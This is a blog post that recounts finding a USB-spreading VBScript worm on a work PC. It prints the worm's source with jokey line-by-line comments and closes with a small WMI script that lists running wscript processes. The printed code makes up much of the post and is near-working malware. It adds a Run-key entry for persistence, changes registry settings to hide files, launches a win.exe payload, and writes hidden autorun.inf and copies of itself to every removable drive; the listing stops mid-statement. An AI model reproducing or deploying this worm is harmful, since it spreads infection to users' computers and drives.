VB Script: How to create a virus?
How to create a virus?
Since quite a couple of weeks I was having slow PC; and eventually dying for a restart. I turned off all of the windows services, I removed all un-necessary software and even those that were necessary but having low usage-frequency. Still to no avail. Then I went through my registry to cleanup unwanted run and run once's.
As I turn on the computer I could see a lot of wscript's running, about tens of them, hogging my CPU and memory like anything. I thought it might be network policy imposed by network department; I used to close all of the running scripts one by one. But an eventual talk to network admin revealed that no PC "runs" the policy on PC start-up, and that they do not have to do anything with the wscript.exe scripts.
Running Symantec EndPoint Protection software that has an up-to-date virus definitions, I could not imagine a virus in my pc.
Most people think that WScript.EXE is a virus, which it is not. Its a windows script hosting(WSH) software. Also, I have used WScript quite a couple of times myself, and probably so is the reason I never thought of removing that exe.
It can potentially execute commands(VB or JScript) that you may not want/desire.
Following is a simple example taken from MSDN, to write in registry.
Dim WshShell, bKey Set WshShell = WScript.CreateObject("WScript.Shell") WshShell.RegWrite "HKCU\Software\ACME\FortuneTeller\", 1, "REG_BINARY" WshShell.RegWrite "HKCU\Software\ACME\FortuneTeller\MindReader", "Goocher!", "REG_SZ" bKey = WshShell.RegRead("HKCU\Software\ACME\FortuneTeller\") WScript.Echo WshShell.RegRead("HKCU\Software\ACME\FortuneTeller\MindReader") WshShell.RegDelete "HKCU\Software\ACME\FortuneTeller\MindReader" WshShell.RegDelete "HKCU\Software\ACME\FortuneTeller\" WshShell.RegDelete "HKCU\Software\ACME\"
So, long story short, this always used to happen when it insert my flash drive in the system. Couple of days ago, I cancelled the Action window that pops up when you insert a flash drive. I browsed the drive using Control+E (Windows Explorer) and to my astonishment I found a .VBS file; which is basically the VB Script file. I renamed the file and opened it. It was the code that was hogging my PC!
Though, I did not like the slow the PC at all, because I couldnt work; but interestingly I did enjoy reading the code (0:
This script is like a mischievous gremlin, quietly wreaking havoc on your computer and any flash drives that dare to cross its path. It’s sneaky, persistent, and definitely up to no good!
Here’s the high-level shenanigans happening in this script, explained in a way that even my grandma would find amusing:
Error? What Error?
The script starts by deciding that errors are for the weak. So, it tells the computer to ignore any mistakes and just keep going. We’re not here for perfection; we’re here for chaos!
Summon the File Wizards!
It conjures up some mystical beings known as FileSystemObject and Shell. These guys are like the Gandalf and Dumbledore of the Windows world, ready to mess with files, folders, and the registry.
Hide the Treasure (or Trash)!
The script checks if there’s a folder called "Tempe" on the C drive. If it finds this magical place, it hides it using some obscure wizardry. Because, clearly, hiding things makes them more special.
Sneaky Registry Tweaks
Next, it sneaks into the Windows registry—like a raccoon rummaging through your trash—and changes some settings to make sure hidden files stay hidden. It's like a digital version of sweeping dirt under the rug.
Unleash the Mysterious "win.exe"
If everything's going smoothly (or at least, nothing's exploded yet), the script checks if a mysterious "win.exe" file is lurking in "Tempe". If it is, the script runs it, because that’s always a good idea... said no one ever.
Infect the Flash Drives!
The script then enters an infinite loop of doom, where it inspects every flash drive you plug in. If it finds one, it sneakily plants some files, including a script that auto-runs whenever the drive is accessed. It’s like a party crasher that shows up every time you open the door.
Copy, Paste, Repeat
The script copies and hides more files onto the flash drive, making sure they’re all in on the fun. It’s like a digital version of glitter—you’ll never get rid of it.
Lather, Rinse, Repeat
This cycle of copying, hiding, and sneaky auto-running continues endlessly, or at least until someone pulls the plug or notices the shenanigans.
Ready to Dive in?
Following is what I found when I opened d.vbs file; I have added a couple of comments just for the reader to better understand the code :o)
--Start Code--
' On Error Resume Next - Because what's life without a little bit of denial?
' This will ignore any errors and proceed as if nothing's wrong. Which is fine, until it isn’t.
Set objfso = CreateObject("Scripting.FileSystemObject") ' Summoning the mystical FileSystemObject to manipulate files like a wizard.
Set ws = CreateObject("WScript.Shell") ' Bringing a shell into existence for registry manipulation. Don’t worry, it won’t bite. (Yet.)
Set sh = CreateObject("Shell.Application") ' Another shell, this one more inclined towards folder and file operations. Because redundancy is comfort.
sour = "C:\Tempe" ' Define a source folder path, possibly a summer retreat for files.
If objfso.FolderExists(sour) Then ' Check if the "Tempe" folder exists. It’s not a visit if there’s no destination.
Set tf = objfso.GetFolder(sour) ' Get that folder, hold it close.
tf.Attributes = 39 ' Hide it away with some mystical numbers (39 to be exact). Shhh, it’s a secret.
End If
a = 0 ' Setting up a little counter.
b = 10 ' Another counter, because one is never enough.
c = 10 ' And just for good measure, a third one.
' Time to mess with the registry!
ws.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Explorer", sour & "\" & "d.vbs"
' Writing a key that tells Windows to run "d.vbs" at startup. Because what's better than starting your day with some VBScript mischief?
ws.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden", 1, "REG_DWORD"
' Toggling SuperHidden files on, because some files are just too shy.
ws.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", 0, "REG_DWORD"
' Turn off showing SuperHidden files, further hiding the shy ones.
ws.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", "1"
' Ensuring regular hidden files stay hidden too. More secrets!
If a = 0 Then ' If the counter is still at zero, let’s get dangerous.
If objfso.FileExists("C:\Tempe\win.exe") Then ' Check if "win.exe" exists in "Tempe", a suspiciously named file in a suspiciously named folder.
ws.Run("C:\Tempe\win.exe") ' If it exists, run it. Because nothing could go wrong with that, right?
End If
End If
Do ' The beginning of an infinite loop, the gift that keeps on giving.
For Each flashdrive In objfso.Drives ' For each drive that might be a flash drive...
If (flashdrive.DriveType = 1 Or flashdrive.DriveType = 2) And flashdrive.Path <> "A:" Then ' ...and isn’t a floppy drive (because seriously, who still uses those?).
If (flashdrive.DriveType = 1) Then ' If it’s a removable drive...
pet = flashdrive.Path & "\" ' Path to the pet (flash drive).
Set tf = objfso.CreateTextFile(pet & "autorun.inf") ' Create an "autorun.inf" file to run scripts without asking nicely.
tf.WriteLine "[autorun]"
tf.WriteLine "shellexecute=wscript.exe d.vbs"
tf.WriteLine "shell=Open"
tf.WriteLine "Shell\Open\Command=wscript.exe d.vbs"
tf.WriteLine "Action=Open to View Folder"
tf.WriteLine "Icon=tere.ico" ' Give it a little icon flair with "tere.ico".
tf.Close
Set tf = objfso.GetFile(pet & "autorun.inf") ' Grab that "autorun.inf" file...
tf.Attributes = 39 ' ...and hide it too. Secrets everywhere!
If objfso.FileExists(pet & "autorun.inf") Then ' If it actually exists (always good to double-check).
Set f = objfso.GetFile(pet & "autorun.inf") ' Get the file...
size = f.Size ' ...check its size...
Set text = f.OpenAsTextStream(1, -2) ' ...and open it up as a text stream.
Do While Not text.AtEndOfStream ' While we're not at the end of this stream of consciousness...
source = source & text.ReadLine ' ...keep reading it line by line.
source = source & vbCrLf ' Add a line break because we're civilized.
Loop
End If
If tf = source Then ' If the "autorun.inf" file is what we think it is...
sour = "C:\Tempe" ' ...set the source path to "Tempe".
Else
Set f = objfso.GetFile(pet & "autorun.inf") ' Otherwise, delete the imposter.
objfso.DeleteFile(f)
End If
If a = 0 Then ' If we're still at the starting point of our counter journey...
ws.Run(pet) ' Run the flash drive path.
ws.Run(pet & "win.exe") ' Run "win.exe" because, why not double down?
End If
a = a + 1 ' Increment that counter. One step closer to...something.
sour = "C:\Tempe" ' Keep that source path consistent.
pet = flashdrive.Path & "\" ' Get the flash drive path again.
dest = flashdrive.Path & "\Tempe" ' Create a destination path on the flash drive.
sours = "C:\Tempe\" ' Yet another source path because it’s good to have backups.
If a = 3 Then ' When the counter hits three...
If objfso.FileExists(pet & "autorun.inf") Then ' Check if our friend "autorun.inf" is still around.
objfso.DeleteFile(pet & "autorun.inf") ' And then delete it because three is enough.
Set Fol = objfso.GetFolder(sour) ' Get the "Tempe" folder again.
Set tf = objfso.CreateTextFile(pet & "autorun.inf") ' Recreate that "autorun.inf" file.
tf.WriteLine "[autorun]"
tf.WriteLine "shellexecute=wscript.exe d.vbs"
tf.WriteLine "shell=Open"
tf.WriteLine "Shell\Open\Command=wscript.exe d.vbs"
tf.WriteLine "Action=Open to View Folder"
tf.WriteLine "Icon=tere.ico"
tf.Close
Set tf = objfso.GetFile(pet & "autorun.inf") ' And hide it again. It’s a vicious cycle.
tf.Attributes = 39
End If
End If
If objfso.FileExists(pet & "d.vbs") Then ' Check if "d.vbs" exists in the flash drive.
sour = "C:\Tempe" ' If it does, keep the source path consistent.
Else
Set Fol = objfso.GetFolder(sour) ' Otherwise, get that "Tempe" folder...
Set f = objfso.GetFile(Fol & "\d.vbs") ' ...get the "d.vbs" file...
objfso.CopyFile f, pet, OverWriteFiles ' ...and copy it to the flash drive. Rinse and repeat.
Set f = objfso.GetFile(pet & "d.vbs")
f.Attributes = 39 ' Hide the "d.vbs" file too.
Set f = objfso.GetFile(Fol & "\win.exe") ' Do the same with "win.exe"...
objfso.CopyFile f, pet, OverWriteFiles
Set f = objfso.GetFile(pet & "win.exe")
f.Attributes = 39
Set f = objfso.GetFile(Fol & "\tere.ico") ' ...and with "tere.ico".
objfso.CopyFile f, pet, OverWriteFiles
Set f = objfso.GetFile(pet & "tere.ico")
f.Attributes = 39
Set tf = objfso.CreateTextFile(pet & "autorun.inf") ' Recreate "autorun.inf" for fun.
tf.WriteLine "[autorun]"
tf.WriteLine "shellexecute=wscript.exe d.vbs"
tf.WriteLine "shell=Open"
tf.WriteLine "Shell\Open\Command=wscript.exe d.vbs"
tf.WriteLine "Action=Open to View Folder"
tf.WriteLine "Icon=tere.ico"
tf.Close
Set tf = objfso.GetFile(pet & "autorun.inf") ' Hide it (again).
tf.Attributes = 39
Set mf = objfso.GetFile(pet & "autorun.inf") ' Check the file size, because we care.
size = mf.Size
Set text = mf.OpenAsTextStream(1, -2) ' Open it up to read some more.
Do While Not text.AtEndOfStream
source = source & text.ReadLine ' Read, read, read.
source = source & vbCrLf ' Line break, because aesthetics matter.
Loop
End If
If objfso.FolderExists(sour) Then ' Check
--End Code--
If you see alot of wscript.exe's running on your machine
And you still doubt their actions; copy and paste the following code into Check for virus.VBS file, and double click to run it.
The following code prints, in form of message box, all of the scripts that is being run under wscript.exe program.
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colItems = objWMIService.ExecQuery _
("Select * from Win32_Process Where Name = 'cscript.exe'" & _
" OR Name = 'wscript.exe'")
For Each objItem in colItems
Wscript.Echo objItem.CommandLine
Next
Keep on pressing the OK button to see the list of scripts being run under wscripts.exe
Enjoy!
